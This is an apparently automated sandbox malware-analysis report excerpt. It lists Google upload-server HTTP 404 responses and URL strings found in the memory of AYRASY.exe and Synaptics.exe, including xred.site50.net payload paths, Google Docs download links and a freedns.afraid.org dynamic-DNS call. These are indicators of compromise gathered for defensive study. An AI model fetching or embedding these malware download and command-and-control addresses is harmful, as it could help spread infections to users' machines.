                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6dn2YiMuFrEVz30xh86cgW93-3PVpCeJYuVa-n7kyBql0GKo1hFdSgyDauFKoAoV1TqsuSZjIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RyFGItg9gk3Hmp-F8ePMjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls; expires=Tue, 01-Jul-2025 10:24:25 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OUs6SLq_gifeKaWfdpW8szT43R6AulKqLDrTgdYvBbpR3pbfDkd0ReVRyEkQDO-S3nK3tmcYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Npx_MsSYLtwC38RCVckNlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5PadOovM7s9q5Wk1FfDLTsnskZrz30GV1YL-mQ5BpWt77CpHEb_GtuOiyxHGGXeWRZM0rBR2YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-blAmeqrZ0EEv6NGq11xvow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46BymJCRqKBorebc2NonONRqLKZVtdOnh7C0s5guQ8geNTZrtyaCD-QHzcNnidF8YOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:27 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-9v7le9JNVb7QErAUUIhmVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Eq4TD4ILL790l7uH5J7z2wbhr4Zmgs6GN2XBwQlw4ULxXgrDMJE5CbSQxx2bJnMtYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:28 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-hU4WgPMxJNCXNXDc4w6K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62pXpF9gPxS4A8wBQVnREIVhhZgjAjf-LpjAHz2m6qfDN1JYdmwcJAmCFIEIo2nkK4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pJ21Rb7YEukVyuqOnJ_5cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5H8Rf2gxopgfU0LNy-PTnvK8i1CW1NpBbzXJGXOXOtCKkUv8iXakdI_QrBpvRvClQZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fntrifWRNxc3w0N0Tpos8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kehbyELL0W91XsWCbMg9moQ5Wzh-IbfwZp6bVz_HIu12WHEwQX_rE4NWCjY54xl4KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:24:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kbX6avv9aSR2lRkvvhaC_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: AYRASY.exeString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978;X
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978l
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3416162659.00000000046DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                                Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl8
                                Source: AYRASY.exeString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: AYRASY.exeString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0.
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: AYRASY.exeString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/der
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/load?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/neer
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/oogle-analytics.com
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ty
                                Source: Synaptics.exe, 00000003.00000002.2455890398.00000000083BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2444140781.000000000617E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMX
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: AYRASY.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                Source: AYRASY.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$J
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&H
                                Source: Synaptics.exe, 00000003.00000002.2441515499.00000000055D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Form
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-arch
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download024
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download13
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6K
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6O
                                Source: Synaptics.exe, 00000003.00000003.2356535180.0000000005615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8Q
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005592000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;O
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;max-
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=2592
                                Source: Synaptics.exe, 00000003.00000002.2436766309.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000003.00000002.2441515499.00000000055D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD3
                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFKNv
